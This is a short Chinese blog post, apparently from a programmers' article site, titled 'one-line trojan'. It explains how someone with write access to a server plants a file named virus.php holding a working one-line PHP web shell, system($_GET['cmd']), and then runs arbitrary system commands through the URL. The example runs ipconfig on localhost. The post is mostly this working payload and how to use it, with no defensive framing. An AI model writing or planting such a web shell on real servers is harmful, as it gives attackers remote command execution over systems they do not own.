一句话木马
程序员文章站
2022-05-27 13:39:05
...
条件:1.有服务器的写入权限。2.知道服务器的地址。目的:将我们的一句话木马插入到服务器的asp文件中。
例如:在服务器的地址里创建一个叫virus.php文件里边放代码:
<?php system($_GET['cmd'])?>
然后我们就可以通过URL去操控服务器的cmd了,例如访问:
http://127.0.0.1/virus.php?cmd=ipconfig
相当于在服务器中打开cmd命令行,输入ipconfig。如图:
下一篇: 给组件添加拖拽对齐辅助线